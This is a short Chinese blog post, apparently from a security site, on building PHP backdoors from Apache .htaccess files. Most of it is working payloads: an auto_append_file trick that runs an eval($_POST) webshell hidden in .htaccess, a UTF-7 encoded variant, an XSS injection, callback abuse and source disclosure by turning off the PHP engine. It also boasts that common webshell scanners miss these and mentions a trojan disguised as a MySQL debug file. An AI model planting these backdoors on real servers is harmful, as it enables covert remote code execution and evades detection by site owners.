利用.htaccess文件构成的PHP后门

病毒木马 (3.3万) 2016-09-26 08:43:13

0x00 .htaccess简介

.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。

平时开发用的最多的就是URL重定向功能。

0x01 开启.htaccess

Apache中修改配置文件httpd.conf

1、修改如下内容

Options FollowSymLinks

AllowOverride None

为:

Options FollowSymLinks

AllowOverride All

2、开启rewrite模块

LoadModule rewrite_module modules/mod_rewrite.so

0x02 后门篇

1、   文件包含

.htaccess:
php_value auto_append_file D:/wamp/www/1.txt
*.php

2、   XSS后门

.htaccess:
php_value highlight.comment '"><script>alert(1);</script>'
*.php

3、   PHP后门

.htaccess:
php_value auto_append_file .htaccess
#<?php eval($_POST[1]);
*.php
.htaccess:
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value auto_append_file .htaccess
#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+Ads
*.php
.htaccess:
php_value unserialize_callback_func "phpinfo"
index.php:
unserialize('O:1:"1":0:{}');

 

类似的回调函数都是可以的,过此处phpinfo要怎么调用才能运行任意代码还没研究出来。

4、   任意文件下载

.htaccess:
php_flag engine 0
*.php

 

0x03 webshell查杀

目前使用了D盾webshell查杀、SeayFindShell等工具对这个都没有查杀效果。不过也都是一些简单的一句话木马了,很容易被入库干掉。自己写了一个伪装成mysql调试文件的PHP木马,感觉好用多了。
THE END

发表评论